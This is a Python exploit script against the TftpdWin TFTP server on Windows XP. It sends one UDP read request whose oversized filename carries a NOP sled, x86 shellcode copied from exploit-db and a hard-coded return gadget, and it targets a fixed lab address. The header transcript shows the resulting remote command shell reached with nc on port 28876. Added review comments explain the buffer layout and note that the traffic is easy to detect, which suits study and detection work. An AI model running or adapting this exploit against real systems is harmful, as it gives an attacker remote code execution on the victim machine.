#!/usr/bin/env python
# $Id: exploit.py,v 1.0 2018/07/06 12:34:39 dhn Exp $
# ~ tftp  nc 172.16.133.129 28876
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\TftpdWin>dir
#  Volume in drive C has no label.
#   Volume Serial Number is 0CDE-D884
#
#    Directory of C:\Program Files\TftpdWin
#
#    07/06/2018  12:33 PM    <DIR>          .
#    07/06/2018  12:33 PM    <DIR>          ..
#    06/03/2006  01:44 PM           109,369 tftp.exe
#    06/03/2006  01:43 PM            57,206 tftpd.chm
#    06/03/2006  01:45 PM           493,026 tftpd.exe
#    07/06/2018  12:33 PM             4,389 unins000.dat
#    07/06/2018  12:33 PM           669,450 unins000.exe
#                   5 File(s)      1,333,440 bytes
#                   2 Dir(s)  39,599,943,680 bytes free
#
# C:\Program Files\TftpdWin>

import struct
import socket

# https://www.exploit-db.com/exploits/13504/
# Opaque x86 payload copied verbatim from the exploit-db reference above.
# Nothing in this file interprets the individual bytes; the main block only
# reads len(shellcode) to size its filler so the overflow buffer stays at a
# fixed 284 bytes.  Left unmodified.
# NOTE(review): the literal is a plain str, which the script relies on being a
# byte string (Python 2 semantics) when it is concatenated with struct.pack
# output and handed to socket.send.
shellcode = (
	"\x31\xc9\x64\x8b\x71\x30\x8b\x76"
	"\x0c\x8b\x76\x1c\x8b\x6e\x08\x8b"
	"\x7e\x20\x8b\x36\x38\x4f\x18\x75"
	"\xf3\x51\x68\x32\x5f\x33\x32\x68"
	"\x66\x56\x77\x73\x68\xb7\x8f\x09"
	"\x98\x89\xe6\xb5\x03\x29\xcc\x29"
	"\xcc\x89\xe7\xd6\xf3\xaa\x41\x51"
	"\x41\x51\x57\x51\x83\xef\x2c\xa4"
	"\x4f\x8b\x5d\x3c\x8b\x5c\x1d\x78"
	"\x01\xeb\x8b\x4b\x20\x01\xe9\x56"
	"\x31\xd2\x42\x8b\x34\x91\x01\xee"
	"\xb4\x36\xac\x34\x71\x28\xc4\x3c"
	"\x71\x75\xf7\x3a\x27\x75\xeb\x5e"
	"\x8b\x4b\x24\x01\xe9\x0f\xb7\x14"
	"\x51\x8b\x4b\x1c\x01\xe9\x89\xe8"
	"\x03\x04\x91\xab\x80\x3e\x09\x75"
	"\x08\x8d\x5e\x04\x53\xff\xd0\x57"
	"\x95\x80\x3e\x73\x75\xb1\x5e\xad"
	"\xff\xd0\xad\xff\xd0\x95\x81\x2f"
	"\xfe\xff\x8f\x33\x6a\x10\x57\xad"
	"\x55\xff\xd0\x85\xc0\x74\xf8\x31"
	"\xd2\x52\x68\x63\x6d\x64\x20\x8d"
	"\x7c\x24\x38\xab\xab\xab\xc6\x47"
	"\xe9\x01\x54\x87\x3c\x24\x57\x52"
	"\x52\x52\xc6\x47\xef\x08\x57\x52"
	"\x52\x57\x52\xff\x56\xe4\x8b\x46"
	"\xfc\xeb\xcd"
)

def p(x):
	"""Pack *x* as a 4-byte little-endian unsigned integer (struct ``<L``).

	Used by the main block to serialise the address appended after the
	padding.  Returns a ``str`` on Python 2 (``bytes`` on Python 3).
	Raises ``struct.error`` when *x* is negative or does not fit in 32 bits.
	"""
	u32_le = struct.Struct("<L")
	return u32_le.pack(x)

if __name__ == "__main__":
	# Build the 284-byte buffer that becomes the TFTP filename field: an 8-byte
	# NOP (0x90) sled, the shellcode, then "A" filler sized so the total is
	# always 284 regardless of len(shellcode).
	# padding = "A" * 284 
	padding = "\x90" * 8
	padding += shellcode
	padding += "A" * (284 - len(shellcode) - 8)
	# Address written immediately after the 284 bytes; the original comment
	# identifies it as a "pop ebp; ret" gadget.  It is hard-coded, so it is
	# specific to the tftpd.exe build listed in the header transcript.
	pop2ret = p(0x00418B51) # pop ebp; ret

	# TFTP packet layout: opcode 0x0001 (RRQ), filename = padding + address
	# (288 bytes), then the NUL-terminated transfer mode "netascii".  The
	# oversized filename is what triggers the overflow (inferred from the
	# layout; the server-side bug itself is not shown here).
	payload = "\x00\x01"
	payload += padding
	payload += pop2ret
	payload += "netascii\x00"

	print("[+] Sending the payload!")
	# One fire-and-forget UDP datagram to a hard-coded target; no reply is read
	# and no socket error is handled.  connect() on a datagram socket only sets
	# the default peer address, it does not verify reachability.
	# NOTE(review): from a detection standpoint an RRQ whose filename field is
	# 288 bytes of mostly non-printable data is a clear anomaly for TFTP (port
	# 69/udp) traffic and is easy to flag at the network layer.
	expl = socket.socket (socket.AF_INET, socket.SOCK_DGRAM)
	expl.connect(("172.16.133.129", 69))
	expl.send(payload)
	expl.close()
